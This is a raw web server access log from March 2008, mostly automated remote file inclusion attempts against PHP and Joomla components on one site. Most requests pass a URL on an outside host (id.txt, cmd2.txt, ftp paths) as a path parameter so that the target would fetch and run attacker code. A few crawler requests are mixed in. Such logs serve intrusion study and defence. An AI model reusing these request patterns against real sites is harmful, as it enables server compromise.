217.110.209.230 - - [23/Mar/2008:18:20:46 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
217.110.209.230 - - [23/Mar/2008:18:20:50 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
74.6.25.121 - - [23/Mar/2008:18:23:08 -0700] "GET /logs/access_071231.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:25:45 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:25:57 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
210.21.49.49 - - [23/Mar/2008:18:28:46 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
210.21.49.49 - - [23/Mar/2008:18:28:47 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:18:28:58 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:18:28:58 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:18:28:58 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:18:30:12 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.150.128.201 - - [23/Mar/2008:18:34:24 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
209.150.128.201 - - [23/Mar/2008:18:34:25 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
209.150.128.201 - - [23/Mar/2008:18:34:25 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
209.150.128.201 - - [23/Mar/2008:18:34:25 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
209.150.128.201 - - [23/Mar/2008:18:34:25 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
209.150.128.201 - - [23/Mar/2008:18:34:25 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:35:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.249.72.194 - - [23/Mar/2008:18:35:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.toulouseangloexchange.com"
66.249.72.194 - - [23/Mar/2008:18:35:36 -0700] "GET / HTTP/1.1" 200 919 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.toulouseangloexchange.com"
202.12.29.5 - - [23/Mar/2008:18:36:13 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.30.226.157 - - [23/Mar/2008:18:38:25 -0700] "GET /logs/access_071224.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:38:31 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:38:32 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:38:32 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:38:32 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:43:35 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:43:58 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:18:44:11 -0700] "GET /logs/access.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:18:44:11 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:18:44:12 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 4513 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:44:34 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:44:34 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:44:35 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:52:14 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:18:52:15 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.186.169.183 - - [23/Mar/2008:18:52:36 -0700] "GET //components/com_calendar.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
208.186.169.183 - - [23/Mar/2008:18:52:36 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
72.32.199.201 - - [23/Mar/2008:18:54:52 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
72.32.199.201 - - [23/Mar/2008:18:54:56 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:57:33 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:18:57:38 -0700] "GET /logs/access_080128.log/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:18:57:38 -0700] "GET /auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:18:57:39 -0700] "GET /logs/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:18:58:03 -0700] "GET /logs/access.log/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:58:32 -0700] "GET //components/com_calendar.php?absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:59:41 -0700] "GET /logs/access.log//components/com_calendar.php?absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:59:41 -0700] "GET /logs/access.log//components/com_calendar.php?absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:59:41 -0700] "GET //components/com_calendar.php?absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.7.207.104 - - [23/Mar/2008:18:59:41 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:18:59:41 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:19:00:02 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:19:00:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:19:00:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:19:01:01 -0700] "GET /logs/access_071217.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.61.37.111 - - [23/Mar/2008:19:01:17 -0700] "GET //components/com_calendar.php?absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.117.225.155 - - [23/Mar/2008:19:01:42 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.61.37.111 - - [23/Mar/2008:19:02:22 -0700] "GET /logs/access.log//components/com_calendar.php?absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.61.37.111 - - [23/Mar/2008:19:02:22 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.86.111.2 - - [23/Mar/2008:19:03:07 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
70.86.111.2 - - [23/Mar/2008:19:03:07 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
74.53.160.98 - - [23/Mar/2008:19:03:14 -0700] "GET /index.php?body=http://veldega-tour.ru/.log/idscan2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:19:04:52 -0700] "GET /logs/access_080128.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:19:04:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:19:04:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.32.199.201 - - [23/Mar/2008:19:05:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
87.118.102.153 - - [23/Mar/2008:19:08:41 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
87.118.102.153 - - [23/Mar/2008:19:08:41 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
77.91.224.8 - - [23/Mar/2008:19:10:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.toulouseangloexchange.com"
77.91.224.8 - - [23/Mar/2008:19:10:35 -0700] "GET / HTTP/1.1" 200 919 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.toulouseangloexchange.com"
74.50.105.133 - - [23/Mar/2008:19:11:18 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.50.105.133 - - [23/Mar/2008:19:11:18 -0700] "GET //skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.50.105.133 - - [23/Mar/2008:19:11:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
203.146.251.123 - - [23/Mar/2008:19:11:29 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [23/Mar/2008:19:11:30 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [23/Mar/2008:19:11:30 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.162.134.138 - - [23/Mar/2008:19:12:12 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.162.134.138 - - [23/Mar/2008:19:12:13 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.162.134.138 - - [23/Mar/2008:19:12:13 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
203.146.251.123 - - [23/Mar/2008:19:12:41 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [23/Mar/2008:19:12:41 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [23/Mar/2008:19:12:42 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
74.50.105.133 - - [23/Mar/2008:19:14:16 -0700] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:19:14:20 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.208.244 - - [23/Mar/2008:19:14:25 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.208.244 - - [23/Mar/2008:19:14:25 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.208.244 - - [23/Mar/2008:19:14:26 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.95.82.113 - - [23/Mar/2008:19:14:56 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
74.95.82.113 - - [23/Mar/2008:19:14:57 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
66.249.72.194 - - [23/Mar/2008:19:15:45 -0700] "GET /logs/access_080121.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.toulouseangloexchange.com"
85.214.56.123 - - [23/Mar/2008:19:17:28 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.56.123 - - [23/Mar/2008:19:17:28 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.56.123 - - [23/Mar/2008:19:17:29 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:19:19:05 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:19:19:05 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:19:19:06 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.28.112.57 - - [23/Mar/2008:19:20:00 -0700] "GET /logs/access_080114.log/config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.28.112.57 - - [23/Mar/2008:19:20:00 -0700] "GET /config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.28.112.57 - - [23/Mar/2008:19:20:00 -0700] "GET /logs/config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
61.250.95.201 - - [23/Mar/2008:19:20:10 -0700] "GET /logs/access_071203.log/admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [23/Mar/2008:19:20:13 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [23/Mar/2008:19:20:13 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.162.134.138 - - [23/Mar/2008:19:20:26 -0700] "GET /logs/access_080211.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.28.112.51 - - [23/Mar/2008:19:21:27 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.28.112.51 - - [23/Mar/2008:19:21:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.28.112.51 - - [23/Mar/2008:19:21:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.53.160.98 - - [23/Mar/2008:19:21:55 -0700] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.160.98 - - [23/Mar/2008:19:21:55 -0700] "GET //skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.160.98 - - [23/Mar/2008:19:21:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:19:22:45 -0700] "GET /logs/access_071217.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
